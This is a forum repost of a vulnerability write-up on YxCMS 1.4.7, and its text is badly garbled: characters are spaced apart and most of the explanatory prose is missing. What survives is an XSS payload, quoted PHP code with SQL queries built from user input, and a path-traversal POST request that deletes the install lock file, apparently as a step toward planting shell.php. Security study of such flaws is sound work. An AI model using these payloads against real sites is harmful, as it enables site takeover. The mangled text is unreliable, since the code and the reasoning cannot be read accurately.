搜索

[19493] 2019-06-06_白帽挖洞技能丨YxCMS1.4.7漏洞分析

文档创建者:s7ckTeam
浏览次数:17
最后更新:2025-01-18
2019-06-06_白帽挖洞技能丨YxCMS1.4.7漏洞分析 Y x C M S   1 . 4 . 7   i   2 0 1 9 - 0 6 - 0 6 i Y x C M S   1 . 4 . 7 7 Y X c m s P H P + M y S q l C A N P H P 使 h t t p s : / / w w w . k a n c l o u d . c n / y o n g h e n g / y x c m s X S S 1 p a y l o a d < s v g / o n l o a d = a l e r t ( 1 ) >

2 p r o t e c t e d / a p p s / d e f a u l t / c o n t r o l l e r / c o l u m n C o n t r o l l e r . p h p
p u b l i c   f u n c t i o n   i n d e x ( ) {         $ e n a m e = i n ( $ _ G E T [ ' c o l ' ] ) ;         i f ( e m p t y ( $ e n a m e ) )   t h r o w   n e w   E x c e p t i o n ( ' ~ ' ,   4 0 4 ) ;         $ s o r t i n f o = m o d e l ( ' s o r t ' ) - > f i n d ( " e n a m e = ' { $ e n a m e } ' " , ' i d , n a m e , e n a m e , p a t h , u r l , t y p e , d e e p , m e t h o d , t p l i s t , k e y w o r d s , d e s c r i p t i o n , e x t e n d i d '         $ p a t h = $ s o r t i n f o [ ' p a t h ' ] . ' , ' . $ s o r t i n f o [ ' i d ' ] ;         $ d e e p = $ s o r t i n f o [ ' d e e p ' ] + 1 ;         $ t h i s - > c o l = $ e n a m e ;         s w i t c h   ( $ s o r t i n f o [ ' t y p e ' ] )   {                 c a s e   1 : / /                         $ t h i s - > n e w s l i s t ( $ s o r t i n f o , $ p a t h , $ d e e p ) ;                         b r e a k ;                 c a s e   2 : / /                         $ t h i s - > p h o t o l i s t ( $ s o r t i n f o , $ p a t h , $ d e e p ) ;                         b r e a k ;                 c a s e   3 : / /                         $ t h i s - > p a g e ( $ s o r t i n f o , $ p a t h , $ d e e p ) ;                         b r e a k ;                 c a s e   4 : / /                         b r e a k ;                 c a s e   5 : / /                         b r e a k ;                 c a s e   6 : / /                         $ t h i s - > e x t e n d ( $ s o r t i n f o , $ p a t h , $ d e e p ) ;                         b r e a k ;                 d e f a u l t :                         t h r o w   n e w   E x c e p t i o n ( ' ~ ' ,   4 0 4 ) ;                         b r e a k ;         } }       p r o t e c t e d / a p p s / a d m i n / c o n t r o l l e r / e x t e n d f i e l d C o n t r o l l e r . p h p
h t t p s : / / w w w . h a c k e r s b . c n / h a c k e r / 8 5 . h t m l 1 访 P a y l o a d p u b l i c   f u n c t i o n   m e s e d i t ( ) {         $ t a b l e i d = i n t v a l ( $ _ G E T [ ' t a b i d ' ] ) ;         i f ( ! $ t h i s - > c h e c k C o n P o w e r ( ' e x t e n d ' , $ t a b l e i d ) )   $ t h i s - > e r r o r ( ' ~ ' ) ;         $ i d = i n t v a l ( $ _ G E T [ ' i d ' ] ) ; / / i d         i f ( e m p t y ( $ t a b l e i d )   | |   e m p t y ( $ i d )   )   $ t h i s - > e r r o r ( ' ~ ' ) ;         $ t a b l e i n f o   =   m o d e l ( ' e x t e n d ' ) - > s e l e c t ( " i d = ' { $ t a b l e i d } '   O R   p i d = ' { $ t a b l e i d } ' " , ' i d , t a b l e i n f o , n a m e , t y p e , d e f v a l u e '         i f ( e m p t y ( $ t a b l e i n f o ) )   $ t h i s - > e r r o r ( ' ~ ' ) ;         i f   ( ! $ t h i s - > i s P o s t ( ) )   {               $ i n f o = m o d e l ( ' e x t e n d ' ) - > E x t f i n d ( $ t a b l e i n f o [ 0 ] [ ' t a b l e i n f o ' ] , " i d = ' { $ i d } ' " ) ;               $ t h i s - > i n f o = $ i n f o ;               $ t h i s - > t a b l e i d = $ t a b l e i d ;               $ t h i s - > i d = $ i d ;               $ t h i s - > t a b l e i n f o = $ t a b l e i n f o ;               $ t h i s - > d i s p l a y ( ) ;         } e l s e {               f o r ( $ i = 1 ; $ i < c o u n t ( $ t a b l e i n f o ) ; $ i + + ) {                 i f ( i s _ a r r a y ( $ _ P O S T [ $ t a b l e i n f o [ $ i ] [ ' t a b l e i n f o ' ] ] ) )                     $ d a t a [ $ t a b l e i n f o [ $ i ] [ ' t a b l e i n f o ' ] ] = i m p l o d e ( ' , ' , $ _ P O S T [ $ t a b l e i n f o [ $ i ] [ ' t a b l e i n f o ' ] ] ) ;                 e l s e                     $ d a t a [ $ t a b l e i n f o [ $ i ] [ ' t a b l e i n f o ' ] ] = h t m l _ i n ( $ _ P O S T [ $ t a b l e i n f o [ $ i ] [ ' t a b l e i n f o ' ] ] ) ;               }               i f ( m o d e l ( ' e x t e n d ' ) - > E x t u p ( $ t a b l e i n f o [ 0 ] [ ' t a b l e i n f o ' ] , " i d = ' { $ i d } ' " , $ d a t a ) )   $ t h i s - > s u c c e s s ( ' ~ '               e l s e   $ t h i s - > e r r o r ( ' ~ ' ) ;           } }
h t t p : / / s b . c o m / i n d e x . p h p ? r = a d m i n / p h o t o / d e l p i c P O S T p i c n a m e = . . / . . / p r o t e c t e d / a p p s / i n s t a l l / i n s t a l l . l o c k 访
2 , 3 5 5 d e l p i c (   ) P O S T 使 u n l i n k p r o t e c t e d / a p p s / a d m i n / c o n t r o l l e r / p h o t o C o n t r o l l e r . p h p $ p i c n a m e $ p a t h s t a t i c   p r o t e c t e d   $ u p l o a d p a t h = ' ' ; / / f i l e _ e x i s t s ( )
1 p u b l i c   f u n c t i o n   d e l p i c ( ) {         i f ( e m p t y ( $ _ P O S T [ ' p i c n a m e ' ] ) )   $ t h i s - > e r r o r ( ' ~ ' ) ;         $ p i c n a m e = $ _ P O S T [ ' p i c n a m e ' ] ;         $ p a t h = $ t h i s - > u p l o a d p a t h ;         i f ( f i l e _ e x i s t s ( $ p a t h . $ p i c n a m e ) )             @ u n l i n k ( $ p a t h . $ p i c n a m e ) ;         e l s e { e c h o   ' ~ ' ; r e t u r n ; }           i f ( f i l e _ e x i s t s ( $ p a t h . ' t h u m b _ ' . $ p i c n a m e ) )               @ u n l i n k ( $ p a t h . ' t h u m b _ ' . $ p i c n a m e ) ;         e l s e   { e c h o   ' ~ ' ; r e t u r n ; }         e c h o   ' ~ ' ; } F o l d e r C h a n g e s V i e w
s h e l l . p h p D : p h p S t u d y P H P T u t o r i a l W W W Y X c m s
p r o t e c t e d a p p s d e f a u l t v i e w d e f a u l t
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理